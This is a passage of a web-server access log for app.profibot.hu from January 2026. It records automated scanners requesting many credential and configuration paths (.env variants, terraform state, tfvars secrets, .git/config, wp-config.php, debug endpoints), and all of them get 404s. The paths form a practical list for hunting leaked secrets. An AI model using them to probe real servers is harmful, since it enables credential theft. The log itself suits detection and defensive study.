[Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env_2" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env_prod" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/k8s/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.docker.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/charts/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env.2024-07" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/containers/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/stripe/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/trace/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/terraform.tfstate" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/docker-compose.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/fastapi/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env.202601" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env.2" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env.202501" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/backup/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env.backup.2026" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/env.txt" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/payment/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/pub/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.firebase/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/app/etc/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/gcp/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/api/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/src/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/rails/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/v2/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/server/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/docker.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/storage/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/express/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/tmp/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/temp/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/private/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/prod.tfvars" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/planetscale/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/secrets.tfvars" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.vercel/project.json" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env.2025-09" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env.202502" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/config/stripe.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env.2025-11" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env.v1" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env.backup3" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env_1" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[21/Jan/2026:00:23:05 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.44.121] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:00:46:36 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 35.157.3.62] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[21/Jan/2026:00:46:36 +0000] - 404 404 - HEAD https app.profibot.hu "/apps" [Client 35.157.3.62] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[21/Jan/2026:00:46:36 +0000] - 404 404 - HEAD https app.profibot.hu "/api/action" [Client 35.157.3.62] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[21/Jan/2026:00:46:36 +0000] - 404 404 - HEAD https app.profibot.hu "/api/actions" [Client 35.157.3.62] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[21/Jan/2026:00:46:36 +0000] - 404 404 - HEAD https app.profibot.hu "/_next/data" [Client 35.157.3.62] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[21/Jan/2026:00:46:36 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 35.157.3.62] [Length 31] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[21/Jan/2026:01:07:28 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 23.27.145.132] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[21/Jan/2026:02:07:40 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 195.178.110.54] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8" "-" +[21/Jan/2026:02:08:03 +0000] - 404 404 - GET https app.profibot.hu "/dist/vue.global.js" [Client 195.178.110.54] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (compatible; archive.org_bot; Wayback Machine Live Record; +http://archive.org/details/archive.org_bot)" "-" +[21/Jan/2026:02:08:05 +0000] - 404 404 - GET https app.profibot.hu "//cdn.js" [Client 195.178.110.54] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7) UCBrowser/2.9.0.263" "-" +[21/Jan/2026:03:19:51 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 84.254.106.197] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:03:19:51 +0000] - 404 404 - GET https app.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:03:19:51 +0000] - 404 404 - GET https app.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:03:19:51 +0000] - 404 404 - GET https app.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 195.178.110.132] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/.env.bak" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/.env.save" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/backend/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/admin/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/.git/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/wp-config.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/wp-config.php.old" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/config.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/config.php.bak" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:03:34:59 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 195.178.110.132] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/aws-config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/aws.config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/debug" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/debug/vars" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/debug/pprof" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/_debug" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/api/debug" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/__debug__" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/debug/default/view" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/_profiler" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:03:34:59 +0000] - 404 404 - GET https app.profibot.hu "/telescope" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:03:35:00 +0000] - 404 404 - GET https app.profibot.hu "/_debugbar" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:35:00 +0000] - 404 404 - GET https app.profibot.hu "/.git/HEAD" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:35:00 +0000] - 404 404 - GET https app.profibot.hu "/.git/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:04:19:13 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 34.87.14.187] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 12) Chrome/111.0 Mobile Safari/537.36" "-" +[21/Jan/2026:04:52:34 +0000] - 404 404 - GET https app.profibot.hu "/.git/config" [Client 93.123.109.175] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "-" +[21/Jan/2026:05:58:57 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 85.11.167.4] [Length 31] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://app.profibot.hu" +[21/Jan/2026:05:58:57 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 85.11.167.4] [Length 31] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 